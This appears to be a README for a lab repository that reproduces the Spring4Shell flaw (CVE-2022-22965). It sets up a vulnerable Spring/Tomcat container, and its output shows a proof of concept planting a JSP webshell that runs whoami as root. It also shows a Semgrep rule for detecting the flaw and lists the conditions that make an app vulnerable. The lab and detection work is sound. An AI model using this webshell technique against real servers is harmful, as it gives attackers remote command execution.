CVE-2022-22965 - vulnerable app and PoC
Trial & error
$ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:latest && sleep 5 && python poc.py
Output example
rce
sha256:f626a2190dc0790c610afd4f12a4b2482b6a726d671fdac1432275de89c07cd6
1a048e5725f754d331de9491d0750c4c7a163472dea1fd1554edccfd00d7f6e5
deploy <Response [200]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [500]>
webshell http://localhost:8080/tomcatwar.jsp?cmd=whoami
root
Identification with Semgrep
$ semgrep --config=semgrep-rule.yml .
Output example
Findings:
src/main/java/com/example/demo/controller/IndexController.java
cve-2022-22965
Semgrep found a match
14┆ @RequestMapping("/index")
15┆ public void index(EvalBean evalBean) {
16┆
17┆ }
Ran 1 rule on 3 files: 1 finding.
Vulnerable app requirements1
- JDK 9 or above
- Standalone Tomcat (no Embedded Tomcat) with WAR deployment
- Any Spring version before 5.3.18 / 5.2.20 (Spring Boot before 2.5.12 / 2.6.6)
- No blocklist on WebDataBinder / InitBinder
- Parameter bind with POJOs directly (no @RequestBody, @RequestQuery, etc.)
- Writeable file system (e.g webapps/ROOT)
Sources
- https://twitter.com/vxunderground/status/1509170582469943303 / https://github.com/craig/SpringCore0day
- https://github.com/fengguangbin/spring-rce-war
Footnotes
-
Assuming exploits similar to the known PoCs. There might be other gadgets...
↩
112 Dec 1, 2022
567 Dec 30, 2022
140 Dec 27, 2022
867 Dec 22, 2022
2 Jun 23, 2022
500 Jan 6, 2023
20 Apr 7, 2022
71 Dec 22, 2022
26 Dec 26, 2022
53 Nov 9, 2022
46 Nov 12, 2022
118 Dec 31, 2022
275 Jan 8, 2023
309 Jan 2, 2023
130 Dec 15, 2022
365 Nov 30, 2022
80 Nov 28, 2022